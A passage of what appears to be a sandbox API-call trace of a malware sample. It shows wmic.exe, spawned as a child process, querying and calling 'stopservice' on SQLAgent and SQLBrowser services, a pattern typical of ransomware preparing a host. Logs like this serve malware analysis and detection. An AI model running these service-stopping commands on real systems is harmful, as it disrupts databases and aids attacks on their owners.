(_Size=0x8) returned 0x47cf60 [0243.241] lstrlenW (lpString="GET") returned 3 [0243.241] lstrlenW (lpString="call") returned 4 [0243.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0243.241] lstrlenW (lpString="LIST") returned 4 [0243.241] lstrlenW (lpString="call") returned 4 [0243.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0243.241] lstrlenW (lpString="ASSOC") returned 5 [0243.241] lstrlenW (lpString="call") returned 4 [0243.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0243.241] WbemLocator:IUnknown:AddRef (This=0x1bd1390) returned 0x3 [0243.241] free (_Block=0x476a50) [0243.241] lstrlenW (lpString="") returned 0 [0243.241] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0243.241] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.241] malloc (_Size=0x14) returned 0x47cc80 [0243.241] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.241] GetCurrentThreadId () returned 0xb70 [0243.241] GetCurrentProcess () returned 0xffffffffffffffff [0243.241] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf6a0 | out: TokenHandle=0xaf6a0*=0x29c) returned 1 [0243.241] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf698 | out: TokenInformation=0x0, ReturnLength=0xaf698) returned 0 [0243.241] malloc (_Size=0x118) returned 0x47cf80 [0243.242] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x47cf80, TokenInformationLength=0x118, ReturnLength=0xaf698 | out: TokenInformation=0x47cf80, ReturnLength=0xaf698) returned 1 [0243.242] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x47cf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1616110660, Attributes=0xf3cd), (Luid.LowPart=0x0, Luid.HighPart=4680272, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=4653400, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000f3d0), (Luid.LowPart=0x0, Luid.HighPart=4706144, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0243.242] free (_Block=0x47cf80) [0243.242] CloseHandle (hObject=0x29c) returned 1 [0243.242] lstrlenW (lpString="GET") returned 3 [0243.242] lstrlenW (lpString="call") returned 4 [0243.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0243.242] lstrlenW (lpString="LIST") returned 4 [0243.242] lstrlenW (lpString="call") returned 4 [0243.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0243.242] lstrlenW (lpString="SET") returned 3 [0243.242] lstrlenW (lpString="call") returned 4 [0243.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0243.242] lstrlenW (lpString="CALL") returned 4 [0243.242] lstrlenW (lpString="call") returned 4 [0243.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0243.242] ??0CHString@@QEAA@XZ () returned 0xaf650 [0243.242] GetCurrentThreadId () returned 0xb70 [0243.242] malloc (_Size=0x18) returned 0x47cca0 [0243.242] malloc (_Size=0x18) returned 0x47ccc0 [0243.243] malloc (_Size=0x18) returned 0x47cce0 [0243.243] malloc (_Size=0x18) returned 0x47cd00 [0243.243] malloc (_Size=0x18) returned 0x47d550 [0243.243] SysStringLen (param_1="\\\\") returned 0x2 [0243.243] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0243.243] malloc (_Size=0x18) returned 0x47d570 [0243.243] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0243.243] SysStringLen (param_1="\\") returned 0x1 [0243.243] malloc (_Size=0x18) returned 0x47d590 [0243.243] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0243.243] SysStringLen (param_1="root\\cimv2") returned 0xa [0243.243] free (_Block=0x47d570) [0243.243] free (_Block=0x47d550) [0243.243] free (_Block=0x47cd00) [0243.243] free (_Block=0x47cce0) [0243.243] free (_Block=0x47ccc0) [0243.243] free (_Block=0x47cca0) [0243.244] malloc (_Size=0x18) returned 0x47cca0 [0243.244] malloc (_Size=0x18) returned 0x47ccc0 [0243.244] malloc (_Size=0x18) returned 0x47cce0 [0243.244] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1bd1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffe529d0 | out: ppNamespace=0xffe529d0*=0x1be3b28) returned 0x0 [0243.249] free (_Block=0x47cce0) [0243.249] free (_Block=0x47ccc0) [0243.249] free (_Block=0x47cca0) [0243.249] CoSetProxyBlanket (pProxy=0x1be3b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0243.249] free (_Block=0x47d590) [0243.249] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.250] ??0CHString@@QEAA@XZ () returned 0xaf3f8 [0243.250] GetCurrentThreadId () returned 0xb70 [0243.250] malloc (_Size=0x70) returned 0x47cf80 [0243.250] malloc (_Size=0x50) returned 0x47d000 [0243.250] malloc (_Size=0x50) returned 0x47d060 [0243.250] malloc (_Size=0x70) returned 0x47d0c0 [0243.250] malloc (_Size=0x70) returned 0x47d140 [0243.250] malloc (_Size=0x48) returned 0x47d1c0 [0243.250] malloc (_Size=0x18) returned 0x47cca0 [0243.250] lstrlenA (lpString="") returned 0 [0243.250] malloc (_Size=0x2) returned 0x476a50 [0243.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffde314c, cbMultiByte=-1, lpWideCharStr=0x476a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0243.250] free (_Block=0x476a50) [0243.250] malloc (_Size=0x70) returned 0x47d210 [0243.250] malloc (_Size=0x48) returned 0x47d290 [0243.250] malloc (_Size=0x18) returned 0x47ccc0 [0243.250] free (_Block=0x47cca0) [0243.250] IWbemServices:GetObject (in: This=0x1be3b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xaf428*=0x0, ppCallResult=0x0 | out: ppObject=0xaf428*=0x1c0c030, ppCallResult=0x0) returned 0x0 [0243.267] malloc (_Size=0x18) returned 0x47cca0 [0243.267] IWbemClassObject:GetMethod (in: This=0x1c0c030, wszName="stopservice", lFlags=0, ppInSignature=0xaf420, ppOutSignature=0xaf438 | out: ppInSignature=0xaf420*=0x0, ppOutSignature=0xaf438*=0x1c0c530) returned 0x0 [0243.267] free (_Block=0x47cca0) [0243.268] IUnknown:Release (This=0x1c0c530) returned 0x0 [0243.268] IUnknown:Release (This=0x1c0c030) returned 0x0 [0243.268] ??0CHString@@QEAA@XZ () returned 0xaf240 [0243.268] GetCurrentThreadId () returned 0xb70 [0243.268] malloc (_Size=0x18) returned 0x47cca0 [0243.268] lstrlenA (lpString="") returned 0 [0243.268] malloc (_Size=0x2) returned 0x476a50 [0243.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffde314c, cbMultiByte=-1, lpWideCharStr=0x476a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0243.268] free (_Block=0x476a50) [0243.268] malloc (_Size=0x18) returned 0x47cce0 [0243.268] lstrlenA (lpString="") returned 0 [0243.268] malloc (_Size=0x2) returned 0x476a50 [0243.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffde314c, cbMultiByte=-1, lpWideCharStr=0x476a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0243.268] free (_Block=0x476a50) [0243.268] malloc (_Size=0x18) returned 0x47cd00 [0243.268] free (_Block=0x47cce0) [0243.268] malloc (_Size=0x18) returned 0x47cce0 [0243.268] lstrlenA (lpString="SELECT * FROM ") returned 14 [0243.268] malloc (_Size=0x1e) returned 0x47d2e0 [0243.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffde4a40, cbMultiByte=-1, lpWideCharStr=0x47d2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0243.269] free (_Block=0x47d2e0) [0243.269] malloc (_Size=0x18) returned 0x47d550 [0243.269] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0243.269] SysStringLen (param_1="Win32_Service") returned 0xd [0243.269] free (_Block=0x47cce0) [0243.269] malloc (_Size=0x18) returned 0x47cce0 [0243.269] malloc (_Size=0x18) returned 0x47d570 [0243.269] lstrlenA (lpString=" WHERE ") returned 7 [0243.269] malloc (_Size=0x10) returned 0x47d590 [0243.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffde3e20, cbMultiByte=-1, lpWideCharStr=0x47d590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0243.269] free (_Block=0x47d590) [0243.269] malloc (_Size=0x18) returned 0x47d590 [0243.269] SysStringLen (param_1=" WHERE ") returned 0x7 [0243.269] SysStringLen (param_1="name like '%%SQLAgent%%'") returned 0x18 [0243.269] malloc (_Size=0x18) returned 0x47d5b0 [0243.269] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0243.269] SysStringLen (param_1=" WHERE name like '%%SQLAgent%%'") returned 0x1f [0243.269] free (_Block=0x47d550) [0243.270] free (_Block=0x47d590) [0243.270] free (_Block=0x47d570) [0243.270] free (_Block=0x47cce0) [0243.270] malloc (_Size=0x18) returned 0x47cce0 [0243.270] IWbemServices:ExecQuery (in: This=0x1be3b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQLAgent%%'", lFlags=48, pCtx=0x0, ppEnum=0xaf228 | out: ppEnum=0xaf228*=0x1be3c28) returned 0x0 [0243.276] free (_Block=0x47cce0) [0243.276] CoSetProxyBlanket (pProxy=0x1be3c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0243.279] IEnumWbemClassObject:Next (in: This=0x1be3c28, lTimeout=-1, uCount=0x1, apObjects=0xaf230, puReturned=0xaf3b8 | out: apObjects=0xaf230*=0x0, puReturned=0xaf3b8*=0x0) returned 0x1 [0243.596] IUnknown:Release (This=0x1be3c28) returned 0x0 [0243.597] free (_Block=0x47d5b0) [0243.597] free (_Block=0x47cd00) [0243.597] free (_Block=0x47cca0) [0243.597] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.597] free (_Block=0x47ccc0) [0243.597] free (_Block=0x47d1c0) [0243.597] free (_Block=0x47d140) [0243.598] free (_Block=0x47d0c0) [0243.598] free (_Block=0x47d060) [0243.598] free (_Block=0x47d000) [0243.598] free (_Block=0x47d290) [0243.598] free (_Block=0x47d210) [0243.598] free (_Block=0x47cf80) [0243.598] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.598] GetCurrentThreadId () returned 0xb70 [0243.598] ??0CHString@@QEAA@PEBG@Z () returned 0xaf748 [0243.598] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xaf748 [0243.598] malloc (_Size=0x800) returned 0x47dd20 [0243.598] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x47dd20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0243.598] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0243.598] malloc (_Size=0x1c) returned 0x47cf80 [0243.598] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x47cf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0243.599] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0243.599] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0243.599] free (_Block=0x47cf80) [0243.599] free (_Block=0x47dd20) [0243.599] ??1CHString@@QEAA@XZ () returned 0x4d53e401 [0243.599] WbemLocator:IUnknown:Release (This=0x1be3b28) returned 0x0 [0243.599] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0243.599] _kbhit () returned 0x0 [0243.601] free (_Block=0x47cf60) [0243.601] free (_Block=0x47cb00) [0243.601] free (_Block=0x47cae0) [0243.601] free (_Block=0x47cac0) [0243.601] free (_Block=0x47caa0) [0243.601] free (_Block=0x47cdc0) [0243.601] free (_Block=0x477140) [0243.601] free (_Block=0x47cf00) [0243.601] free (_Block=0x478680) [0243.601] free (_Block=0x47cba0) [0243.601] free (_Block=0x47cbc0) [0243.601] free (_Block=0x476ea0) [0243.601] free (_Block=0x47d4d0) [0243.601] free (_Block=0x47cbe0) [0243.601] free (_Block=0x47cc40) [0243.601] free (_Block=0x47d450) [0243.601] free (_Block=0x47d3d0) [0243.601] free (_Block=0x47cc20) [0243.602] free (_Block=0x47cc00) [0243.602] free (_Block=0x47cc60) [0243.602] free (_Block=0x47d370) [0243.602] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0243.602] free (_Block=0x47ce60) [0243.602] free (_Block=0x47cb40) [0243.602] free (_Block=0x47cf30) [0243.602] free (_Block=0x47cb80) [0243.602] free (_Block=0x478600) [0243.602] free (_Block=0x47cb60) [0243.602] free (_Block=0x47cb20) [0243.602] free (_Block=0x477f70) [0243.602] free (_Block=0x476980) [0243.602] free (_Block=0x4769d0) [0243.602] free (_Block=0x47cc80) [0243.602] free (_Block=0x476ac0) [0243.602] free (_Block=0x476e80) [0243.602] free (_Block=0x478040) [0243.602] free (_Block=0x476e60) [0243.602] free (_Block=0x478000) [0243.602] free (_Block=0x476e00) [0243.602] free (_Block=0x476e20) [0243.602] free (_Block=0x476ce0) [0243.602] free (_Block=0x476d00) [0243.603] free (_Block=0x476c80) [0243.603] free (_Block=0x476ca0) [0243.603] free (_Block=0x476d40) [0243.603] free (_Block=0x476d60) [0243.603] free (_Block=0x476da0) [0243.603] free (_Block=0x476dc0) [0243.603] free (_Block=0x476bc0) [0243.603] free (_Block=0x476be0) [0243.603] free (_Block=0x476b60) [0243.603] free (_Block=0x476b80) [0243.603] free (_Block=0x476c20) [0243.603] free (_Block=0x476c40) [0243.603] free (_Block=0x476b00) [0243.603] free (_Block=0x476b20) [0243.603] free (_Block=0x476a70) [0243.603] free (_Block=0x476a20) [0243.603] free (_Block=0x47cd30) [0243.603] WbemLocator:IUnknown:Release (This=0x1bd1390) returned 0x2 [0243.604] WbemLocator:IUnknown:Release (This=0x1be3a98) returned 0x0 [0243.604] WbemLocator:IUnknown:Release (This=0x1bd1390) returned 0x1 [0243.604] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0243.604] WbemLocator:IUnknown:Release (This=0x1bd1390) returned 0x0 [0243.604] free (_Block=0x47ca20) [0243.604] free (_Block=0x47ca40) [0243.604] free (_Block=0x478540) [0243.604] free (_Block=0x47ca60) [0243.604] free (_Block=0x47ca80) [0243.604] free (_Block=0x478580) [0243.604] free (_Block=0x47c8a0) [0243.605] free (_Block=0x47c8c0) [0243.605] free (_Block=0x4783c0) [0243.605] free (_Block=0x47c8e0) [0243.605] free (_Block=0x47c900) [0243.605] free (_Block=0x478400) [0243.605] free (_Block=0x47c820) [0243.605] free (_Block=0x47c840) [0243.605] free (_Block=0x478340) [0243.605] free (_Block=0x47c860) [0243.605] free (_Block=0x47c880) [0243.605] free (_Block=0x478380) [0243.605] free (_Block=0x47c9a0) [0243.605] free (_Block=0x47c9c0) [0243.605] free (_Block=0x4784c0) [0243.606] free (_Block=0x47c9e0) [0243.606] free (_Block=0x47ca00) [0243.606] free (_Block=0x478500) [0243.606] free (_Block=0x47c7a0) [0243.606] free (_Block=0x47c7c0) [0243.606] free (_Block=0x4782c0) [0243.606] free (_Block=0x47c7e0) [0243.606] free (_Block=0x47c800) [0243.606] free (_Block=0x478300) [0243.606] free (_Block=0x47c920) [0243.606] free (_Block=0x47c940) [0243.606] free (_Block=0x478440) [0243.606] free (_Block=0x47c960) [0243.606] free (_Block=0x47c980) [0243.606] free (_Block=0x478480) [0243.607] free (_Block=0x47c6e0) [0243.607] free (_Block=0x47c700) [0243.607] free (_Block=0x478200) [0243.607] free (_Block=0x47c5a0) [0243.607] free (_Block=0x47c5c0) [0243.607] free (_Block=0x4780c0) [0243.607] free (_Block=0x47c560) [0243.607] free (_Block=0x47c580) [0243.607] free (_Block=0x478080) [0243.607] free (_Block=0x47c620) [0243.607] free (_Block=0x47c640) [0243.607] free (_Block=0x478140) [0243.607] free (_Block=0x47c720) [0243.608] free (_Block=0x47c740) [0243.608] free (_Block=0x478240) [0243.608] free (_Block=0x47c5e0) [0243.608] free (_Block=0x47c600) [0243.608] free (_Block=0x478100) [0243.608] free (_Block=0x47c660) [0243.608] free (_Block=0x47c680) [0243.608] free (_Block=0x478180) [0243.608] free (_Block=0x47c6a0) [0243.608] free (_Block=0x47c6c0) [0243.608] free (_Block=0x4781c0) [0243.608] free (_Block=0x47c760) [0243.608] free (_Block=0x47c780) [0243.608] free (_Block=0x478280) [0243.609] CoUninitialize () [0243.649] exit (_Code=0) [0243.649] free (_Block=0x476ef0) [0243.649] free (_Block=0x477f30) [0243.649] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.649] free (_Block=0x476fe0) [0243.649] free (_Block=0x476ae0) [0243.649] free (_Block=0x477ef0) [0243.649] free (_Block=0x477eb0) [0243.649] free (_Block=0x477e60) [0243.650] free (_Block=0x477e20) [0243.650] free (_Block=0x475ac0) [0243.650] free (_Block=0x477da0) [0243.650] free (_Block=0x475a80) [0243.650] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.650] free (_Block=0x4785c0) Thread: id = 147 os_tid = 0x8e0 Thread: id = 148 os_tid = 0x648 Thread: id = 149 os_tid = 0x308 Thread: id = 150 os_tid = 0x6fc Thread: id = 151 os_tid = 0x79c Process: id = "17" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1420a000" os_pid = "0x920" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 153 os_tid = 0x36c [0243.860] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfed0 | out: lpSystemTimeAsFileTime=0xcfed0*(dwLowDateTime=0xa71bc750, dwHighDateTime=0x1d61d49)) [0243.860] GetCurrentProcessId () returned 0x920 [0243.860] GetCurrentThreadId () returned 0x36c [0243.860] GetTickCount () returned 0x1166c89 [0243.860] QueryPerformanceCounter (in: lpPerformanceCount=0xcfed8 | out: lpPerformanceCount=0xcfed8*=36403364137) returned 1 [0243.864] GetModuleHandleW (lpModuleName=0x0) returned 0xff8f0000 [0243.864] __set_app_type (_Type=0x1) [0243.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff93ced0) returned 0x0 [0243.865] __wgetmainargs (in: _Argc=0xff962380, _Argv=0xff962390, _Env=0xff962388, _DoWildCard=0, _StartInfo=0xff96239c | out: _Argc=0xff962380, _Argv=0xff962390, _Env=0xff962388) returned 0 [0243.865] ??0CHString@@QEAA@XZ () returned 0xff962ab0 [0243.865] malloc (_Size=0x30) returned 0x455a80 [0243.866] malloc (_Size=0x70) returned 0x457db0 [0243.866] malloc (_Size=0x50) returned 0x455ac0 [0243.866] malloc (_Size=0x30) returned 0x457e30 [0243.866] malloc (_Size=0x48) returned 0x457e70 [0243.866] malloc (_Size=0x30) returned 0x457ec0 [0243.866] malloc (_Size=0x30) returned 0x457f00 [0243.866] ??0CHString@@QEAA@XZ () returned 0xff962f58 [0243.866] malloc (_Size=0x30) returned 0x457f40 [0243.866] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0243.866] SetConsoleCtrlHandler (HandlerRoutine=0xff935724, Add=1) returned 1 [0243.866] _onexit (_Func=0xff94f378) returned 0xff94f378 [0243.866] _onexit (_Func=0xff94f490) returned 0xff94f490 [0243.866] _onexit (_Func=0xff94f4d0) returned 0xff94f4d0 [0243.867] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0243.867] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0243.871] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0243.884] CoCreateInstance (in: rclsid=0xff8f73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff8f7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff962940 | out: ppv=0xff962940*=0x1e11390) returned 0x0 [0243.894] GetCurrentProcess () returned 0xffffffffffffffff [0243.894] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xcfca0 | out: TokenHandle=0xcfca0*=0xf4) returned 1 [0243.894] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfc98 | out: TokenInformation=0x0, ReturnLength=0xcfc98) returned 0 [0243.895] malloc (_Size=0x118) returned 0x456990 [0243.895] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x456990, TokenInformationLength=0x118, ReturnLength=0xcfc98 | out: TokenInformation=0x456990, ReturnLength=0xcfc98) returned 1 [0243.895] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x456990*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=611532216, Attributes=0xb8f5), (Luid.LowPart=0x0, Luid.HighPart=4554624, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0243.895] free (_Block=0x456990) [0243.895] CloseHandle (hObject=0xf4) returned 1 [0243.895] malloc (_Size=0x40) returned 0x457f80 [0243.895] malloc (_Size=0x40) returned 0x456990 [0243.895] malloc (_Size=0x40) returned 0x4569e0 [0243.895] malloc (_Size=0x20a) returned 0x456a30 [0243.895] GetSystemDirectoryW (in: lpBuffer=0x456a30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0243.895] free (_Block=0x456a30) [0243.895] malloc (_Size=0x18) returned 0x456a30 [0243.895] malloc (_Size=0x18) returned 0x456a50 [0243.895] malloc (_Size=0x18) returned 0x456a70 [0243.895] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0243.896] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0243.896] free (_Block=0x456a30) [0243.896] free (_Block=0x456a50) [0243.896] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0243.896] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0243.896] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0243.896] FreeLibrary (hLibModule=0x77940000) returned 1 [0243.897] free (_Block=0x456a70) [0243.897] _vsnwprintf (in: _Buffer=0x4569e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcf8c8 | out: _Buffer="ms_409") returned 6 [0243.897] malloc (_Size=0x20) returned 0x456a30 [0243.897] GetComputerNameW (in: lpBuffer=0x456a30, nSize=0xcfca0 | out: lpBuffer="XDUWTFONO", nSize=0xcfca0) returned 1 [0243.897] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.897] malloc (_Size=0x14) returned 0x456a60 [0243.897] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.897] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcfc98 | out: lpNameBuffer=0x0, nSize=0xcfc98) returned 0x7fffffde000 [0243.898] GetLastError () returned 0xea [0243.898] malloc (_Size=0x40) returned 0x456a80 [0243.898] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x456a80, nSize=0xcfc98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcfc98) returned 0x1 [0243.899] lstrlenW (lpString="") returned 0 [0243.899] lstrlenW (lpString="XDUWTFONO") returned 9 [0243.899] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 